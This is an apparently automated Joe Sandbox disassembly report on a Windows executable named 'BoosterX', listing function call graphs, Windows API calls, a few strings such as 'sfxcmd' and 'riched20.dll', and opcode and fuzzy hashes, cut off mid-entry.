                                                    control_flow_graph 3586 7ff6c037fc8c-7ff6c037fcb7 3587 7ff6c037fcbc-7ff6c037fcf6 SetEnvironmentVariableW call 7ff6c036d05c 3586->3587 3588 7ff6c037fcb9 3586->3588 3591 7ff6c037fcf8 3587->3591 3592 7ff6c037fd43-7ff6c037fd4b 3587->3592 3588->3587 3595 7ff6c037fcfc-7ff6c037fd04 3591->3595 3593 7ff6c037fd4d-7ff6c037fd63 3592->3593 3594 7ff6c037fd7f-7ff6c037fd9a call 7ff6c03822a0 3592->3594 3596 7ff6c037fd7a call 7ff6c038218c 3593->3596 3597 7ff6c037fd65-7ff6c037fd78 3593->3597 3599 7ff6c037fd09-7ff6c037fd14 call 7ff6c036d43c 3595->3599 3600 7ff6c037fd06 3595->3600 3596->3594 3597->3596 3601 7ff6c037fd9b-7ff6c037fda3 call 7ff6c0387884 3597->3601 3607 7ff6c037fd16-7ff6c037fd21 3599->3607 3608 7ff6c037fd23-7ff6c037fd28 3599->3608 3600->3599 3607->3595 3610 7ff6c037fd2d-7ff6c037fd42 SetEnvironmentVariableW 3608->3610 3611 7ff6c037fd2a 3608->3611 3610->3592 3611->3610
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 3540648995-3493335439
                                                    • Opcode ID: 00e990ce53ad4bb77229a3bc1c9449996c970d45aeb73b3f170da1ca566d15b8
                                                    • Instruction ID: 7f8e44470c02af5e478f1bd349c54f86d4fe816c745d99009353df3431bb8c29
                                                    • Opcode Fuzzy Hash: 00e990ce53ad4bb77229a3bc1c9449996c970d45aeb73b3f170da1ca566d15b8
                                                    • Instruction Fuzzy Hash: A3318D32E14A17A8EB04CF69E8851AC2371FB48B99F140136DE9DD7BA9CF38D181C344

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                    • String ID: ]
                                                    • API String ID: 3561356813-3352871620
                                                    • Opcode ID: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                                    • Instruction ID: f62f4d5ae1b706c02aa08932f8b30f7c34bf52f225c1e16191e264a00bfd60cf
                                                    • Opcode Fuzzy Hash: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                                    • Instruction Fuzzy Hash: 28118921B0D643D1FA649F5A97543795291AF89BD6F080034DD9DC7BD5DF7CE8048A00

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 1266772231-0
                                                    • Opcode ID: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                                    • Instruction ID: e3ddd8fb059d2879a33c2980d187b27be210b708872bb24e64d6a1886af7798c
                                                    • Opcode Fuzzy Hash: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                                    • Instruction Fuzzy Hash: 83F0EC25A38953A2FB609F28E895A762265FFD070AF905431E58EC1A94DF3CD108CB00

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction ID: c1b454e9a1fc8c1fa46544e6b8b7868d97a7eda04d7380af6890835675e7a089
                                                    • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction Fuzzy Hash: CA018121B08A43A1FA209F29F8157B66394AF99746F840132CD8EC6795DF3CD149C640
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: c8c518eed565a04f9cf962580e303a423e678b4aba21c9ba139e0a597fc40599
                                                    • Instruction ID: ed812d31465adc4af887a32dcbca9dc79f1f7b700c45529b03e743efb92b4397
                                                    • Opcode Fuzzy Hash: c8c518eed565a04f9cf962580e303a423e678b4aba21c9ba139e0a597fc40599
                                                    • Instruction Fuzzy Hash: C751D362A19A43A2EA10CF24D4447BA6360FF85B96F450132EF8EC6BA4DF7CE585C704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                    • String ID:
                                                    • API String ID: 2912839123-0
                                                    • Opcode ID: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction ID: 47cda9a0dedd55f4ddc6a9fce855363da8d97eaab6f4fd5b07fa4a941dae6ae8
                                                    • Opcode Fuzzy Hash: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction Fuzzy Hash: C3518C62F28A53A4FA009FA5D8492AD2322AF45BA5F500737DA9CD7BE6DF6CD540C310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction ID: c4c38bf8b7586b8303e3b1cd336a65be94b13014ad90e45e27d75e90e458b4ca
                                                    • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction Fuzzy Hash: D4313A21E0C50366FA54AF65D4113BA1291AF81386F5446B7EACECB3E3DF2CB5088209
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction ID: 1dbc31a451841fa45a65a347f09dad39766d48d10021e3d14302aec98aef5932
                                                    • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction Fuzzy Hash: 56219D25E0CE13A5EB609F21A4002BD63A0FB85B9AF254130DFDDCA784CF3CE8458749
                                                    APIs
                                                      • Part of subcall function 00007FF6C036EC58: ResetEvent.KERNEL32 ref: 00007FF6C036EC71
                                                      • Part of subcall function 00007FF6C036EC58: ReleaseSemaphore.KERNEL32 ref: 00007FF6C036EC87
                                                    • ReleaseSemaphore.KERNEL32 ref: 00007FF6C036E8F0
                                                    • CloseHandle.KERNELBASE ref: 00007FF6C036E90F
                                                    • DeleteCriticalSection.KERNEL32 ref: 00007FF6C036E926
                                                    • CloseHandle.KERNEL32 ref: 00007FF6C036E933
                                                      • Part of subcall function 00007FF6C036E9D8: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9DF
                                                      • Part of subcall function 00007FF6C036E9D8: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9EA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 502429940-0
                                                    • Opcode ID: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                                    • Instruction ID: 393edb40ceeaeb62289e81360e3e61e99893a989f45846952e62b3f98aeb7556
                                                    • Opcode Fuzzy Hash: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                                    • Instruction Fuzzy Hash: 7801ED36A14A92B2E6589F21E5456A96361FB84B91F004031DB9EC3765CF39E4B98740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2610526550-3849766595
                                                    • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction ID: 39510812d605197777590c218bc65c78219d23695b3a67fe4cd7a9cc895fc9ae
                                                    • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction Fuzzy Hash: B4114F31A18A43A2FB00DF14E8411A97360FB8479AF544131DACDC2769DF3CE58AC740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: DirectoryInitializeMallocSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 174490985-3360196438
                                                    • Opcode ID: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction ID: c00f2adafac0504afa2f4b0fe69451bd44500b60900ce126fb0fa0a1e30b5c43
                                                    • Opcode Fuzzy Hash: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction Fuzzy Hash: A2F04F71A18A4292EB409F24F4191AAB7A0FF88759F400135E6CEC2794DF7CD148CB00
                                                    APIs
                                                      • Part of subcall function 00007FF6C03784BC: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6C03784EC
                                                      • Part of subcall function 00007FF6C036AAA0: LoadStringW.USER32 ref: 00007FF6C036AB27
                                                      • Part of subcall function 00007FF6C036AAA0: LoadStringW.USER32 ref: 00007FF6C036AB40
                                                      • Part of subcall function 00007FF6C0351FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C0351FFB
                                                      • Part of subcall function 00007FF6C035129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C0351396
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C038013B
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C0380141
                                                    • SendDlgItemMessageW.USER32 ref: 00007FF6C0380172
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                    • String ID:
                                                    • API String ID: 3106221260-0
                                                    • Opcode ID: cf0567e6bf8155e956a8b4511c09126abe169540c11f499ccdae7d5e6eb88ab3
                                                    • Instruction ID: 36752f7f68b3954f208e3e8bc770f78dcfd9f68c73ce9fd95bcc123621c48653
                                                    • Opcode Fuzzy Hash: cf0567e6bf8155e956a8b4511c09126abe169540c11f499ccdae7d5e6eb88ab3
                                                    • Instruction Fuzzy Hash: E351AD62F14A83AAFB109FA5D4452FC2362AB85B99F500636DE8DD779ADF2CE500C340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2272807158-0
                                                    • Opcode ID: 4ce6273eae071ea6a15124b4380fd2fe6d767a0844e08d4acde4de8883fd2a1f
                                                    • Instruction ID: 2d5e0b697f5cc7d609fa94930720c46b724531d42a1d57d8432ea85812206137
                                                    • Opcode Fuzzy Hash: 4ce6273eae071ea6a15124b4380fd2fe6d767a0844e08d4acde4de8883fd2a1f
                                                    • Instruction Fuzzy Hash: 9341A162A08B82A2EA208F15E4542A963A1FB85BB5F104735DFEDC7BD5CF3CE4908604
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 2176759853-0
• Opcode ID: ffc9a95c2eb917f8c271226651a7e4a3727d16229f8ced3e106e1d1b4614c68e
• Instruction ID: 3c99c75ccd8bf705c97f3d0e88e7e83b8d3cc61be258ffff984e04cf2e540ffc
• Opcode Fuzzy Hash: ffc9a95c2eb917f8c271226651a7e4a3727d16229f8ced3e106e1d1b4614c68e
• Instruction Fuzzy Hash: 3821A262A18B8292EA149F65A84017AB365FB89BD1F144336EFDD83BA5DF3CD191C700
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1875163511-0
• Opcode ID: ca0a1d78d8e6314f917be1bc01cc39d67f07e0dfb053114c640b6c34b82875d2
• Instruction ID: 7b36cdaa6a6d2f747f07886a0599ed23da335009b19869f23c1dc1b39e235db2
• Opcode Fuzzy Hash: ca0a1d78d8e6314f917be1bc01cc39d67f07e0dfb053114c640b6c34b82875d2
• Instruction Fuzzy Hash: A5315E62A08A87A1FB249F18E5443B963A0EB40B85F540632D7CCD67A5DF6CE556C301
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1203560049-0
• Opcode ID: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
• Instruction ID: b7290e927097bcbe99497dff990d05509bce789ad69ab517ff7de9920e5e1d82
• Opcode Fuzzy Hash: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
• Instruction Fuzzy Hash: 8B21C522B1CA83A2EA208F25E44526A6361FFC9B96F105231EEDEC7795DF3CD544C640
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3118131910-0
• Opcode ID: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
• Instruction ID: c6b023deca0bee5c1cdfd6592c4218709c302357a6d79262bed5d710236e84f9
• Opcode Fuzzy Hash: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
• Instruction Fuzzy Hash: 8521B322A1C78392EA108F25E45526E6361FBC5B96F500231EEDDC6B99DF3CD140CA40
APIs
Memory Dump Source
